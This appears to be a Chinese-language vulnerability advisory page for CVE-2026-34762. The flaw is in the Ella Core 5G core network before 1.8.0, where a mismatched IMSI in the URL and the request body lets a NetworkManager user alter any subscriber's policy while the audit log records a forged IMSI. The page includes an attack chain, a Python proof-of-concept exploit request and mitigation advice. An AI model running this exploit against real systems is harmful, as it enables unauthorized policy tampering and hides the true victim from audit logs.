IPBUF安全漏洞报告
English
CVE-2026-34762 CVSS 2.7 低危

CVE-2026-34762 Ella Core 订阅策略篡改漏洞

披露日期: 2026-04-02

漏洞信息

漏洞编号
CVE-2026-34762
漏洞类型
权限绕过
CVSS评分
2.7 低危
攻击向量
网络 (AV:N)
认证要求
高权限 (PR:H)
用户交互
无需交互 (UI:N)
影响产品
Ella Core

相关标签

Ella Core5G Core权限绕过逻辑漏洞IDORAPI安全

漏洞概述

Ella Core是专用于私有网络的5G核心网系统。在1.8.0版本之前,其PUT /api/v1/subscriber/{imsi}接口存在逻辑缺陷,未验证URL路径中的IMSI与请求体中的IMSI是否一致。这使得拥有NetworkManager权限的攻击者可以修改任意订阅者的策略,且审计日志会记录错误的信息,从而掩盖攻击行为。

技术细节

该漏洞源于API设计中的逻辑验证缺失。当服务器处理PUT /api/v1/subscriber/{imsi}请求时,直接使用URL路径参数中的IMSI作为数据库查询的主键来更新记录,但并未校验请求体(JSON Payload)中携带的IMSI字段是否与URL参数一致。攻击者只需具备NetworkManager的认证身份,即可构造恶意HTTP请求:将URL参数设定为受害者的IMSI,而将请求体中的IMSI设定为任意值(如攻击者自己或随机值)。服务器会执行对受害者的策略修改操作(完整性影响),同时在审计日志中记录请求体中的IMSI,导致日志无法反映真实的攻击目标(日志伪造)。这种不一致性使得高权限用户可以绕过隐含的对象访问限制。

攻击链分析

STEP 1
1. 权限获取
攻击者获取Ella Core系统中NetworkManager角色的有效凭证(高权限账户)。
STEP 2
2. 构造恶意请求
攻击者构造PUT请求,URL路径填入目标受害者的IMSI,请求体JSON中填入伪造的IMSI和新的策略值。
STEP 3
3. 发送利用请求
向服务器发送请求。由于服务端未校验URL与Body中IMSI的一致性,直接处理请求。
STEP 4
4. 篡改与掩盖
受害者的策略被成功修改(完整性受损),但审计日志记录的是伪造的IMSI,掩盖了真实的受害者身份。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target configuration target_url = "http://ella-core-instance/api/v1/subscriber/460019999999999" # Victim's IMSI auth_token = "Bearer <NetworkManager_Valid_Token>" # Headers headers = { "Authorization": auth_token, "Content-Type": "application/json" } # Payload containing a mismatched IMSI (Attacker's or Fabricated) payload = { "imsi": "999990000000000", # This IMSI will be logged in audit trail "policy": "unrestricted_access" } # Send the PUT request # The server updates the policy for the Victim's IMSI in the URL # but logs the IMSI from the payload response = requests.put(target_url, json=payload, headers=headers) if response.status_code == 200: print("[+] Exploit successful: Policy modified and audit log likely fabricated.") else: print("[-] Exploit failed.") print(response.text)

影响范围

Ella Core < 1.8.0

防御指南

临时缓解措施
在升级修复前,应严格限制NetworkManager账户的分配,仅赋予必要人员。同时,管理员应审查现有的API访问日志,重点关注URL路径IMSI与请求体IMSI不一致的异常记录,以检测是否已被利用。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表